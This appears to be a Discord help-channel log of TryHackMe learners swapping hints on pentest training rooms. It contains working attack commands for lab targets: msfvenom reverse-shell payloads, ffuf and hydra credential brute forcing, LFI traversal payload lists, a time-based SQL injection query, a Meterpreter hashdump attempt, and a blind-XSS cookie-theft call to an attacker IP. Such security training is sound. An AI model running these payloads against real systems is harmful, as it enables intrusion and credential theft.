hehe, I am stuck at this too... I tried all escapes and encodings I knew, and it is all filtered, I also start to think that somehow the function needs to be broken, but also... it cannot be THAT complicated taking into consideration level of other tasks :/ I am missing something simple, I bet, uh

Same here…

Can anyone lend a hand in the Walking an Application room of the Jr. Pentester path: I cannot find the "directory listing" flag in Task 3. I've found every other flag but can't seem to find what they're talking about for that one. Any hints would be greatly appreciated.

You're iver thinking it. Try other http methods besides GET

I did, and it still have filters for null byte 😄 I am taking a break from it, I know it is simple, will back to it later with a fresh mind 😉

The new room Linux PrivEsc Task 5. I can’t transfer the exploit to the target permissions denied. Is this normal?

Not all directories are writable (by the user).

Oh ok thanks. Didn’t say that in the instructions.

Well, that's something you should find out, haha.
Try looking around for writable folders

You don't have to look deep

Coffee time 😂

Hey, Im doing REloaded CTF and I'm struggling to modify the instruction on level 2

I've done level 0,1,3

But I can't get 2 flag

Note; I'm not struggling to export it, I'm struggling to MODIFY it

I just can't find the modify button to access it

Dm me if you can help me out

Has anyone done the XSS room in the JR penetration path?

Hi, I am working on networkservices and it's asking what port SMB runs on and I have tried 445/tcp and it would not accept the answer. Any clue?

I recommend googling it. Two ports are common with SMB. 445 is one of them.

Got it thanks.

Gave +1 Rep to @wanton pollen

Anyone on the jnr pentester new path.?

Yes

whats up

Walking an application lab....i need to know what the directory is. It's saying run the directory in your web browser. I must be blind

Sorry wrong room. Let me check real quick

What question is it?

@dusty gyro what task?

Question is. What is the directory listing flag?

Task 3

have you tried viewing the source file?

Check where all the files are listed

Yes I viewed page source, I just don't understand what directory to check

What directory are all the files listed in

Ok so I had some help earlier today before I had to go to work but, I had no success with question 3 and 4 on “Walking An Application “ Penn testing.
Question 3. What is the directory listing flag?

Question 4. What is the framework flag?
I’ve been looking and trying but now I must ask for some hints? Please and thank you.

HINT for question 3: Look at the directory all the other files are located in.

@wanton pollen +1

@idle basalt same question 3 is like wth

In the source page there are other files. Look that their paths.

ok thanks, let me go and see.

Gave +1 Rep to @wanton pollen

@wanton pollen do you guys maybe have a line number?

line 45
line 46
line 47

@dusty gyro are you stuck on task 3? Look at the comments at the top

I have the directories but don't know how to access the flag.txt file.

I'm totally blind 👀

What directory are you looking at?

iv clicked on those links and still dont see the flag for question 3, i've clt F to search and im not getting no where

@idle basalt same here. Searched every file.

It's a path we have to run somehow

i see that its all linked to assests but i can't get no where with that dir

have you entered http://[ipaddr]/[file_from_comment] ?

Let's run just the assets path

that is the correct directory. Look at all the files listed

Hmmmm index of assets!!!!!!

Got it!!!!

Thanks guys!!!!!!

Your welcome

@dusty gyro not sure if your username is a breaking bad reference or resevior dogs... either way, I like it

@plucky snow the one you think is the coolest.

nice... breaking bad it is!

i see while i was having a problem with most of what i was trying to do, i had the same ipAdd from the frist time i logged in and didnt know that every time you log in you get a different ip. so nothing was working

i meant why i was having problems

yeah thanks alot for your help

Gave +1 Rep to @plucky snow

@idle basalt rock on!

how to do the RFI in file inclusion playground challenge?

i didnt really understand how to implement the RFI

then go through the room again first, then be more specific, which part didnt you get? how to create the payloads?

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://machine_ip/customers/login -fc 200
does the command contain any kind of error ?
because whenever i am trying to bruteforce, i get no results

i know machine_ip will be replaced

the issue i had with that command is, that seclists wasnt in the wordlists folder, so i had to modify the path, other than that, the command looks good

yeah, i got it now

but i can see that it's located correctly

in the machine

does your valid username file correctly list the usernames only?

it also has [some shit]

then modify the file so that it has only the usernames

in my case i got an error, when i used the file with the raw output

so i modified the file so that only the usernames remained, line by line, and it worked then

ok

thanx man it worked

nice 🙂

In Lab #2, what is the directory specified in the include function?

I am trying to solve this from past one day...but I didn't get it

Can someone help in this

||look at the cookie, look at the directory. look at the cookie, look at the directory.|| does something strike you?

Can i get a hint for exploitingvulrabilityv2

I cant find the CVE or exploit anywhere

Nessus doesnt know.....Exploit database has no clue

Anyone give me a nudge on why my lfi isn't working on sky net. Its taking my rev php from my http server fine but won't execute to give a shell

Have screen shots lol

Could you provide a room link and a task number?

jr pentester path sqli room task 8
found the column names but not able to proceed further

please help

What kind of reverse shell did you use?

php reverse shell

Dm me the command you're using as well as the shell

Anyone able to DM me for some help with the FileInclusionVM, task 8, flag3

What have you tried so far?

Methods scan shows the site supports GET, HEAD, POST, and OPTIONS

For GET, it is filtering special chars used in the previous tasks. Does not escape with %00 or /.

GET also appends a '.php' to the input

POST does not respond to anything and appends '.php'

You did something wrong then

I've tried again to check using php://input, php://filter and data://text/plain;base64 to escape whatever is being filtered for function include and include_path

The base64 still is being filtered and it cannot escape the appending of '.php' for POST or GET.

hex encode doesn't work either

Used all the same steps with language and doest work either.

In all the responses I've captured in Burp, the form action is still set to ".//chall3.php" method=GET

I'm noticing if I test manually in the browser, replaying requests and editing them, the response url shows '/challenges////chall3.php...' ; the '/' seems be getting added after each try

Is that part of the issue? Should I only be using Burp/Zap?

I used curl to do it

Should I be manipulating the 'referer' header at all for a POST?

I've gone through all the same manual tests with referer on GET and POST and it still doesn't seem to work

No

just remember, just cuz you can't visually see data you input being returned disent mean it's not there

curl worked fine for me

Completely hung at the SSRF / anyone have any hints with the first part?

You mean task 2?

Yes lol, I saw some notes you posted and still a bit confused.

Mh, well first I would try to figure out where you have to put the server.website.thm/flag?id=9 in the URL in order to make the server requesting at the bottom to start with https://server.website.thm/flag?id=9

So the standart URL if you start that task is https://website.thm/item/2?server=api so what for example happens at the bottom with the server requesting if you replace the api with test1234

I don’t even wanna talk about it . 😑 the “ =api “ is what caught me where I was trying to use that rather than seeing that as the viable. Thanks man

Gave +1 Rep to @left thunder

Try hack me … the curse of over thinking lol

You are welcome 🙂

So I have a telnet session open and this question asks me what word the generated payload starts with, but when I run the commad nothing happens

HOld on

might just be the wrong IP

still nothing happens

Is the word generated supposed to be on the local machine or on this same telnet session?

You have to run the msfvenom command on your attackbox terminal and not in the telnet session

<--- @left thunder Thank you!

Gave +1 Rep to @left thunder

hello guys, was there anyone who had issue with Cross-site Scripting getting the last session cookie?

I have spent hours of trying yesterday but couldnt recieve the cookie :-((

Hello I was having trouble using the commands provided in the Authentication Bypass room the brute force section. I cant get the command to work and I've tried several ways and I've also tried using the repository in Github. Please help.

direct message me

i am stuck maybe just overthinking, cant find answer what framework favicon belong to have md5sum but does not help

check the https://wiki.owasp.org/index.php/OWASP_favicon_database

and search for the sum

yes, i found my md5sum

so you find the framework

next to it

hmmm does not fit in the answer

Are you talking about Task3?

6 letters

yes

my sum is 3 words

ok favicon last word

can i dm u dont want to spoil here for everyone

🙂

direct mess me

ANYONE could help me with Blind SQLi - Task8? Stucked at enumerating records... already have table, columns and all the stuff

could you copy/paste what your query looks like so far? (spoilered of course)

I'm stuck on Lab3 for the file inclusion I got the file to be displayed but in the wrong format apparently

Hi, I'm stuck at the File Inclusion room on challenges - capture flag2. Can anybody guide me for this?

This ended up giving me the help I needed, thanks!

Gave +1 Rep to @left thunder

Hi Guys
can any one help me
i am stuck at below point
Now rerunning Curl Request 2 but with your @acmeitsupport.thm in the email field you'll have a ticket created on your account which contains a link to log you in as Robert. Using Robert's account, you can view their support tickets and reveal a flag.

Curl Request 2 (but using your @acmeitsupport.thm account):

user@proud scarab:~$ curl 'http://10.10.204.219/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'

Answer the questions below
What is the flag from Robert's support ticket?
when i ran above command nothing is happing
and i am getting same output for all three curl commands as suggsted in task discription
please help

room - Authentication Bypass

in jr pentration testor room

Did you replace the {username} variable in the command accordingly?

Helped him with #room-\

Well, that's awkward.

But yes, that is what he forgot to do.

Could also be the case that he signed up with the user {username}. 😂

Would be an interesting name to be sure.

Room https://tryhackme.com/room/fileinc, File Inclusion, Task 8, capture flag 3
. and / are filtered so adding ../../../../../etc/passwd results in etcpasswd. Any idea how to bypass this filter. I've already tried ....//....//...// and several encodings The result is always etcpasswd

Is this the one where the hint is "not everything is filtered"?

yes

Try sending your request with a different method. :)

because of the hint I thought maybe doubling would work.
OK, was scratching my HEAD about that, will try that

Good luck, and remember if you send a POST request you need to include the parameters in the body and not in the query.

worked perfect, ty

Gave +1 Rep to @lean rover

Has anyone worked through the blind xss, task 8 in room xssgi, using netcat? I'm not catching anything in the listener when triggering the stored payload.

But the THM request catcher seems to catch only DNS requests. No cookies

Ah figured it out. Was not getting the cookie with 'fetch' so I changed it up to using a 'new Image()src=attacker_ip/?cookie= ...'

Guys

can any help me in File Inclusion room

challange Capture Flag1 at /etc/flag1

The input form is broken! You need to send POST request with file parameter!

please help

done

Hello everyone, I am in the "Burp Suite: The Basics" room, and I am stuck in a question for hours and I am not finding it. Please help me.
The question is below -->

There is one particularly useful option that allows you to intercept and modify the response to your request. What is this option? Note: The option is in a dropdown sub-menu.

Try right clicking an intercepted request on proxy tab

Hello, I'm at windows prives, task 5 dll hijacking. I cannot manage to connect as the other user. I did as it says in the hint You can modify the skeleton code using this snippet: system("cmd.exe /k net user jack Password11");, but when I try to connect it says that the password is wrong. I tested the example with the first dll when it outputs the whoami to a file and its working perfectly.

got it. 👍

I need some help with task 2 of SSRF https://tryhackme.com/room/ssrfqi

I have spent hours at this point trying to research and make sense of this, but I cannot get the server to request correctly. I need to request https://server.website.thm/flag?id=9 and the best guess I have is https://website.thm/item/2?server=server.website.thm/flag&x=&id=9. I don't necessarily want the answer spoon-fed but I'd really like to know the logic behind why this doesn't work and how I can be led in the right direction.

You know what &x= does right? As if you know what it does, it makes no sense to put it in the place you put it for your best guess solution.

Just use hint and focus on this "In this example, the attacker can control the server's subdomain to which the request is made. Take note of the payload ending in &x= being used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string."

I could need a hint for the new file inclusion room, task 8 question 2-3

Play around with the cookie value to see what happens. (Question 2)

i just solved flag 2 🙂

now i only need 3 + plaground

Same for me, but I'm too tired to do them today, so therefore I don't have a hint for you 😄

you already helped enough 🙂 thanks

Gave +1 Rep to @left thunder

I've been on Q3 in that same room for a bit, still racking my brain about it

Which you need help with Challenge 3 or playground?

Challenge 3, haven't looked at playground yet

What have you tried so far?

Changing requests I know of (POST, GET, COOKIE) changed cookie, tested out all characters and tried inputting via address bar, input box, curl and the inspector tool

I figured out what the filter does and thought encoding would work, but hasn't panned out yet

Also tried a bunch of random lines from PayLoadAllTheThings in the File Inclusion/Filters section

What happened when you changed it to POST?

Everything got scrubbed, so a GET request of ../../../etc/flag1 would return etcflag.php, but a POST request of that same thing would return only .php .....

Ah ok I'm a bit closer, just have to figure out how to drop the .php off I think

Why would a post request drop everything? Is it really dropping everything? What is a POST request? Are you actually asking for any data to be displayed for you?

Just some things for you to consider

Yeah I'm following you, but oddly enough if you change the page source to POST and input your directory traversal payload it doesn't get filtered (but keeps the .php on the end, even with null bytes)

My line of thinking could definitely be out in left field though

hey

does anyone worked on this event

jr pentester

Yep I'm running through that

dude i kinda

need help about flags

dunno how to find

xD

You're getting there. You just need to figure out how to remove the .php. there is a way to do it. Just keep trying

I'm at the same point. Feel like I've tried almost every way to remove the .php. Can I get a direction to work in?

@wintry wyvern have you found anything?

Nada. Still struggle bussin over here.

Only thing odd that I've noticed is that it's posting to .//chall3.php instead of ./chall3.php, but idk if that's of any significance.

I've tried changing it

Yeah I see what you're talking about... It'll be something totally easy, just watch lol

were you able to figure it out? I'm in the same boat, I found checked the hash but cannot get the answer to pass

hello everyone im stuck n the question's in Walking An Application

What is the flag from the HTML comment?

What is the flag from the secret link?

What is the directory listing flag?

does anyone have the answer please

https://tryhackme.com/games/koth/33573 help

Hey
Anyone available for a small nudge for CCT2019 - crypto 1c ?

do you still need help with the filee inclusion

hello, I am doing CC pentesting and I am trying sudo john — format=RAW-MD5 txt but I get the output

Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
No password hashes left to crack (see FAQ)

any ideas?

I struggle with Task 6 here

can someone help?

task six of ?...

5, sorry :))

morning here

I simply can't understand it and I read the room entirely all over again

https://tryhackme.com/room/oscommandinjection

have you tried the cheat sheet they link in the room

yes

I can't understand it

can I DM you?

sure

Yes. Redone it again and got different sum, not sure how or why, but this time correct one 🙂

Yeah I later noticed my machine was out of time. I will try again when my free time is back! Thanks

Gave +1 Rep to @white elm

Nice

you are here too 😆

I do. Still haven't figured it out

Guys please help - room SQLInjection - Jr Pen Tester task - 8 Blind SQLi - Time Based
i successfully find out database name as sqli_four
but not able to find table name
i am running below query
https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_scheme = 'sqli_four' and table_name like 'a%';--
i tried a to z

I need help on the room Authentication Bypass - Task 5 Cookie Tampering - I'm trying to running on the command line curl -H machine_IP Set-Cookie:session=eyJpZCI6MSwiYWRtaW4iOnRydWV9; Max-Age=3600; Path=/ => I have the follow error: curl (3) ended with 's' - and - Max-Age=3600: command not found

you got absolutely zero 5second waits?

yes

yes i got, 5 sec hold when i execute admin123' UNION SELECT SLEEP(5),2 where database() like 'sqli_four%';--

for database name

WHERE table_schema

Not table_scheme

nice catch

@steady stratus I feel bad pining ninja a 4th time so I'm pinging you now

Cmn isn't a mod.
Pinging us in each channel isn't overly helpful, it's basically always in every channel.

Ah ok.

I know for next time then

Someone can help in task5 Command Injection Room

$;

Doing zeno. I got the script working once. THought it hung up so I killed it and tried again. Now I am getting connection refused over and over. I havent changed anything. Is this a part of this box?

My bad for this type silly typo Thanks !! and appreciated👍

Gave +1 Rep to @waxen mica

Literally reading through your replies about TASK 2 SSRF helped me...I needed to slow down and pay attention. Thanks!

Gave +1 Rep to @sly moth

Happy learning !! 👍

Can anyone help me about a msfvenom error?
I have executed sucessfully a msfvenom code msfvenom -p linux/x64/shell/reverse_tcp -b "\x00" LHOST=10.11.47.25 LPORT=4545 -f elf -o x64shell.elf
And downloaded in the victim machine but when I am executing the x64shell.elf code, I am getting the following error -->
$ chmod +x x64shell.elf $ ./x64shell.elf Segmentation fault (core dumped)

Did you verify the system architecture of the target machine?
It might be x86 and thus not working with the x64 binary

Did not verified, but I have tried with both the x64 and x86 payload. But getting the same error.

Could you please provide the room name, so that I can try to look into it on my side?

Metasploit: Exploitation https://tryhackme.com/room/metasploitexploitation
Task 6 Msfvenom

question 2: meterpreter payload "linux/x64/meterpreter/reverse_tcp"

It did work for me using.
I have used stageless payload

msfvenom --payload linux/x86/shell_reverse_tcp LHOST=$MY_IP LPORT=$PORT -f elf -o meta

okay. I am trying with it.

BTW, looks like my subscription is over 🥲
I will try your method once I subscribe again soon

i didn't use -b (bad chars). you tried with/without?

Okay. Thank you.

Gave +1 Rep to @sturdy hearth

noted

It worked. 😋

Aren't you using msfconsole?
Because for staged payloads, msfconsole sends the stage when it receives the connection first

Yes I am using msfconsole

meterpreter > hashdump [-] The "hashdump" command requires the "priv" extension to be loaded (run: load priv) meterpreter > load priv Loading extension priv... [-] Failed to load extension: i486-linux-musl/priv not found
Can anyone correct me.

What I am doing wrong

`msf6 post(linux/gather/hashdump) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > options

Module options (post/linux/gather/hashdump):

Name Current Setting Required Description

SESSION 2 yes The session to run this module on.

msf6 post(linux/gather/hashdump) > sessions

Active sessions

Id Name Type Information Connection

1 shell sparc/bsd 10.11.47.225:4545 -> 10.10.179.193:35442 (10.10.179.193)
2 meterpreter x86/linux murphy @ ip-10-10-179-193.eu-west-1.compute.internal 10.11.47.225:4545 -> 10.10.179.193:35444 (10.10.179.193)

msf6 post(linux/gather/hashdump) > run

[-] Post aborted due to failure: no-access: Shadow file must be readable in order to dump hashes
[*] Post module execution completed`
Also getting the error like this.

You need to have read access to /etc/shadow

hi all, I have question, about this room https://tryhackme.com/room/oscommandinjection, tried to put several php reverse shell but it always returned as text. (I know because it's using input sanitation so every input words will be not passed except the number).
I also tried to put echo passthru but I guess I broke the website (website became unresponsive).
Do you have any clue about it?

you can read the flag from the webpage itself. just include the command with the loopback address

shell isnt important

wow I never thought of it. thanks!!

Gave +1 Rep to @green agate

my pleasure!

how do i base64 encode a list like this:

admin:password
admin:
admin:Password1
admin:password1
admin:admin
admin:tomcat
both:tomcat
manager:manager
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:tomcat
tomcat:s3cret
tomcat:password1
tomcat:password
tomcat:
tomcat:admin
tomcat:changethis

like line by line

you mean like automated?

i mean like if use echo '*' | base64

then the whole thing gets incoded

Probably need a for loop

hmm

If you want to encode line by line

Authentication bypass task 5 how do I go about decode and encode of base64 value

https://gchq.github.io/CyberChef/ is a great tool for that.

Great got the answers thankyou 😎@left thunder

Also for base64 you can use the base64 command

https://www.man7.org/linux/man-pages/man1/base64.1.html

If in doubt check gtfo bins

hey, i need help with the room wireshark 101, task 7. How do i use/run the files attatched to the task? because my pc cant open .pcap files.

you need to open them in wireshark

ahhhh, that makes sense. Thanks

👍

happy to help

Anyone avaliable?

For?

Just ask your question. Don't ask to ask

@waxen mica I'm on subdomain enumeration task 6. I ran the first script. I'm looking for a hint on what the new subdomain would be. Can't find it

@granite sphinx username is nyan

they're both nyan?

Yes

lol

left part of the hash is the username

right one is the password

so yeah nyan:nyan

I ran the script. It just has words

@burnt rivet not the answer but a words list

@burnt rivet

It's just running wild

I mean task 6@burnt rivet

Task 6 first script

The one you mentioned is for the second script@burnt rivet thanks

Gave +1 Rep to @burnt rivet

The task is explaining the process of what you need to do. The first tip is to run the first script. Since it will always give you a result, you need ti add what's added in the second scrip

I see, so the first script would just run anyway 👍thanksss

@burnt rivet @waxen mica thanks guys. 👍 it woooorked=)

Gave +1 Rep to @burnt rivet

Protocols and Servers 2, Task 6, can someone give me the password as it says its gonna take 219 hours for hydra to find the password lmao

@burnt rivet wdym for the first user, i thought it used the one i specified id assume

hydra -l lazie -t 32 -P /usr/share/wordlists/rockyou.txt imap://10.10.152.***

@burnt rivet u right it isn't reaching wtf

hi I'm doing the sensitive data exposure room and I need a hint to something but please don't give me the answer directly

I'm at the point where I need to find the password in the source code of the web page and I keep trying to use CTRL-F and type in things like "password" or "text" etc but I never get to the password

could someone help?

thanks

I am looking at source code of Vulnerable website btw

Try expanding all the divs in the associated section of the site. I believe this is the same room I couldn't find the info either.

Could someone give me a hint on copying an msfvenom payload to a target box? I have an established telnet session, but nothing else to go on.

I tried dragging and dropping the payload into the window and that didn't do anything.

I figured it out a few minutes ago

nevermind

No worries!

@quaint beacon can i dm you regarding empline box

c2Vzc2lvbj04OGE1ZTZhZjVhYWE4YWM0ZDliYTllY2U0NjAxY2NhYg== this is the base64 value
session=88a5e6af5aaa8ac4d9ba9ece4601ccab this is the decoded value
still it's showing incorrect

Of course

hi everyone, I got stuck in File Inclusion room of Jr. Pentester part. Can't solve any challenge questions. Currently on Challenge1 tried all payloads from PayloadAllTheThings but can't get it to work
I'm curious if I should add an extra header
any help is appreciated

If you are talking about task 8, what have you tried to get the first flag?

Tried running ../../../etc/flag1
../../../etc/flag1%00
%252e%252e%252fetc%252fflag1
%252e%252e%252fetc%252fflag1%00
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/flag1
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/flag1%00
../../../etc/flag1......................................................................................
../../../etc/flag1............................................
../../../etc/flag1/./././././././././././././././././././././././././././././././././././././././././././.
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/flag1
....//....//etc/flag1
..///////..////..//////etc/flag1
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/flag1
all these as a POST

Basically tried all the payloads for LFI in PayloadAllTheThings

Authentication Bypass : Logic Flaw. I have read it 5+ times and followed the steps. I checked DDG to see if their is any walkthroughs on how to do it. None. No write ups.
What is the flag from Robert's support ticket?
I do the three steps and check the web site link.
I have shut down the attack box each time and started over from the top working through the entire room and find the same answers from top to bottom. I still can't get past Logic Flaw to complete it.

I have that completed. let me know where do you need help with

Authentication Bypass : Logic Flaw step 4

I put in the three
Curl Request 1:
curl 'http://10.10.252.132/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
Curl Request 2
curl 'http://10.10.252.132/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'
Repeat Curl Request 3
curl 'http://10.10.252.132/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'

Have you manually created a user?

got stack on the same task, did you try to get flag2?

I thought I did. I restarted the room.
Tried to recreate the user
An account with this username already exists

None of the challenges so far. Got admin from Challenge 3

you need to create a completely new user

I thought when I closed and terminated the room, it blanked everything.

All other tasks completed except this one.

I'm really not sure if it does. Just start from scratch and make sure you create a new user before Curl2

You need to put your your address (what you enter in time of creating account instead {username}@customer.acmeitsupport.thm eg. guru@customer.acmeitsupport.thm THEN YOU will receive a ticket to reset robert account. and after clicking the reset link you will get the flag on support ticket section

https://giphy.com/gifs/chordoverstreet-chord-overstreet-26FLgGTPUDH6UGAbm

could't solve any of them... also stack on next SSRF Practical section

Same

just got a solution from jr pen test room...!

inspect on current avatar and u should see a base64 string that ends with ==

I'm stuck SSRF example and haven't got to practical yet

oh!

I'm stuck on flag 2 in the file inclusion challenge. switched the cookie but not getting anywhere further

change it again and see what happens

when I change the value I see it on the page, but that doesn't seem to affect the requests I'm making. Am I missing something?

change it to something unsual, like pumpernickle. check the request and the response. see if it did what you "expected" or different

AHH! I missed the most obvious answer, thank you!

Gave +1 Rep to @glass eagle

its easy to assume it's behavior. but we didn't write the code. test it to understand it.

Thank you. I was also stuck there and it clicked finally

Gave +1 Rep to @glass eagle

Now challenge 3 I have been banging my head on the keyboard for an hour

yeah. its hard to know what to look for. something small, obvious, trying something completely different

sometimes i switch between devtools/curl/burp just to get new view on it

what have you tried?

Changing to POST, multiple iterations of ../../etc/flag3 in dev tools. Trying to use different request parameters even though I don’t quite understand how to do that

okay. thats the right direction. does something (unexpected) happen between your request and the reponse?

try pumpernickle again and check it carefully

and getting an error doesn't always indicate failure. could be progress

feel free to ping or msg directly for some more 1-1 help

I will start over from step 1 and work through each one. I will create the new user. My only issue is they are asking for Robert's Flag.

Once you do everything correctly you should be authenticated as Robert and see the flag in his open tickets

I just wished the directions were better. On one of the other sections, I created the valid_addresses.txt by hand with the 4 names.

were you able to read Roberts ticket?

I'm doing the Network Services 2 and I'm having trouble understanding how the syntax for mounting an SMB share works. Here are my tries.

You are using the right syntax(the first one in case you have the /root/smbthings directory created) but you are not mounting the correct share. The sharename "share" is just an example and not an actual existing one.

no. I will try again tonight or tomorrow.

Ok cool, so through the nmap scan is where I can find the share name?

I think you can, but if I remember correctly, in that task they mention enum4linux, I think it's easier to do it with that.

oooooh is it the /usr/sbin/showmount -e [IP] command?

Oh or that one, yes.

cool thank you ❤️ @left thunder

Gave +1 Rep to @left thunder

windows privesc can someone help me i feel dumb asking this. how do you get the powersploit onto the web-based windows machine if i cant use the web browser in the windows machine

have you transferred things like linpeas to a linux box?

no

i have done stuff using wget and curl with servers on python

so you know how you can download it

from powershell or cmd

wget and curl work well ill be damned let me face palm myself real quick thanks
Message #room-hints

Gave +1 Rep to @woven perch

haha no problem. happy to help

Anyone having issues with Windows PrivEsc DLL Hijacking - it will not let me start the service

Has anyone had an issue with submitting the staff-session cookie on Cross-site Scriting?

Thanks again. I finally got the flag with your hints

Gave +1 Rep to @glass eagle

Hello! Can someone give me a hint on overpass Task 1 please? Im stuck getting a foothold... I have tried LFI since I get ouput for some files but I can't access any other files than the "publicly known" ones...

Hey guys, I am stuck in the authentication by pass room of the jr. Penetration tester path where we have to find the username and password .
I know am writing the correct command. When I use the filter -fc 200, I can see that one matching credential is found, but when I use the same command and use ">> filename.txt" to fetch the output on the txt file. There is no output seen there

Can anyone give me a hint here as to what am I doing wrong

Hey @digital bay im stuck at the same spot. Does your output in the valid_usernames.txt look like mine? "[2Kadmin [Status: 200, Size: 3720, Words: 992, Lines: 77]". I get only errors when using this wordlist

Yes it's the same

But I don't think the issue is in the wordlist, that's fine

That is the issue actually, your username wordlist has to be 1 username per line without any other status codes or whatsoever.

How do I get that, I tried outputting it using "-o" switch and using ">>"

Are there any other ways ?

There are only 4 usernames, so I would just make that file on your own.

After restarting AttackBox and creating the file on my own it worked. thank you @left thunder

Gave +1 Rep to @left thunder

where did you get the LFI? unless you've found something new, that isn't the way in. DM if you want a hint.

I didn't get any lfi, but I thought I could... But found a foothold after starting all over again 🙂 But thank you!

Gave +1 Rep to @polar finch

are you still having problems with this? i just did it, the jobs seem to be running fine

No I got it! Was a stupid mistake...But thank you!

Hello everyone. I am having a tough time getting through the task 5 of Linux PrivEsc from jr pentester.
I have download the exploit code for the vulnerability to the attackbox. its a .txt file which I have also transferred to the target machine using wget. but How do I run this .txt exploit file?? :/

If you have the correct exploit you should read the comments of it. Should give you an idea of what you should do with that file.

Also lookup any commands in the comments you don't know

also last hint: it should not be a text file

https://tryhackme.com/room/owasptop10 - command injection practical ....im struggling with this - how do i get the OS?

I created a new user named scsiraidguru. got the ticket. Thanks.

Gave +1 Rep to @eternal pagoda

How do I give you +1 Rep for your help?

just @ and tag them and say thank you

Gave +1 Rep to @loud lotus

If you are still looking for this, in that task it gives a few commands to try

Gave +1 Rep to @eternal pagoda

if none of those give you exactly what you need then google something like "how to check version of linux"

I would also suggest taking what you find and putting it in your notes. A good free room to look at would be https://tryhackme.com/room/linprivesc task 3

Thanks

Gave +1 Rep to @woven perch

hello guys,am stuck at a room(walking an application),i don't know the site they're talking about so i couldn't find the flag there are looking for

can you send a screenshot of the page

i have figured it out,thanks

mm,sorry am stuck again,i cant find the answer to the last two questions,i want to send the screenshot but i don't know how

??

i'm stuck with metasploit Exploitation

i already read again the room

If you are stuck with something and need help, you should provide more informations then only the info that you are stuck 🙂

In order to be able to send screenshots in here, you have to verify your THM account in discord first.

!docs verify

I'm going to try it using a kali machine, this is what I got earlier. My first guess was that I'll have to use msfdb

I think you already got an answer to that in another channel? The rev_shell.elf file you have created with msfvenom is supposed to be executed on the target machine. So do you have that .elf file already on the target machine(not on your own machine)?

yes

So while creating that file with msfvenom, what payload have you specified?

followed this example

Okay and what in that example is deemed the payload?

If you are unsure, you could enter msfvenom -l payloads that will give you a list with all available payloads.

linux/x86/meterpreter/reverse_tcp

Right, so that means inside the msfconsole, you have to set your listener (multi/handler) to that exact same payload as you have used with msfvenom.

oh, let me try, thanks

Gave +1 Rep to @left thunder

https://tryhackme.com/room/winprivesc

how to get into the machine

any idea ?

Rdp

Creds are in task 5 I believe

ok

Thank you for your help.

Gave +1 Rep to @eternal pagoda

Good Morning All!!

I am having an issue in the following room:

https://tryhackme.com/room/fileinc  | Task 4 - Local File Inclusion (LFI).   

I have read through the page several times, but the examples they give in the URL do not in any way match what I am seeing when I am attempting lab 1.

You are prompted to enter a file to include "Example: welcome.php"

This now presents up with the current path:  /var/www/html

I then enter: /var/www/html/../../../../etc/passwd

Which returns a hard to read file preview. I press ctrl+u to view page source and get a clean version there.

root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/bin/sh
bin❌2:2:bin:/bin:/bin/sh
sys❌3:3:sys:/dev:/bin/sh
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/bin/sh
man❌6:12👨/var/cache/man:/bin/sh
lp❌7:7:lp:/var/spool/lpd:/bin/sh
mail❌8:8:mail:/var/mail:/bin/sh
news❌9:9:news:/var/spool/news:/bin/sh
uucp❌10:10:uucp:/var/spool/uucp:/bin/sh
proxy❌13:13:proxy:/bin:/bin/sh
www-data❌33:33:www-data:/var/www:/bin/sh
backup❌34:34:backup:/var/backups:/bin/sh
list❌38:38:Mailing List Manager:/var/list:/bin/sh
irc❌39:39:ircd:/var/run/ircd:/bin/sh
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody❌65534:65534:nobody:/nonexistent:/bin/sh
libuuid❌100:101::/var/lib/libuuid:/bin/sh
mysql❌101:102:MySQL Server,,,:/nonexistent:/bin/false

I performed a nmap scan and found ports 22 and 80 open. So I assumed we would find user name here, but no dice.

Question 1 asks: Give Lab #1 a try to read /etc/passwd. What would the request URI be?

answer format: `/****.*********/***/******`

I have looked online, and all the walkthroughs state there is a user Falcon which is commented out, but as you can see from the results above that is not the case. It seems to be a similar room, but the layout is different If someone can please help me understand this better I would appreciate it!

I'm not quite sure what you mean with any user ? All you have to do is trying to get the /etc/passwd file displayed, which seems you have successfully done and then enter the URI you have requested in order to get that file displayed. You kind of did it in a bit of a strange way, which might will make your answer not work, but you where at least able to get the file displayed.

I can get /etc/passwd to display as you see above.. But to do so I used the current "path' of /var/www/html/../../../../etc/passwd <---- this does not fit the answer profile they are looking for and it says it is incorrect

The warning implies that you are already inside the /var/www/html directory and with your requested path you are trying to get out of that directory in order to access /etc/passwd. So I'm not sure why you add /var/www/html to your request.

Ok, even if I enter ../../../../etc/passwd without the current path.. it returns exactly the same thing. and every example I found online or from the cheatsheet on guthub always uses the full path. I'm not getting an error? Not sure where you got that. I'm getting the contents of the file, which is the goal.. but the format of the answer doesn't make sense to me. If there is another way to form the URL for this request it isn't shown in the material

I'm not looking for the answer, I'm looking for what I'm missing or doing wrong. This just isn't clicking

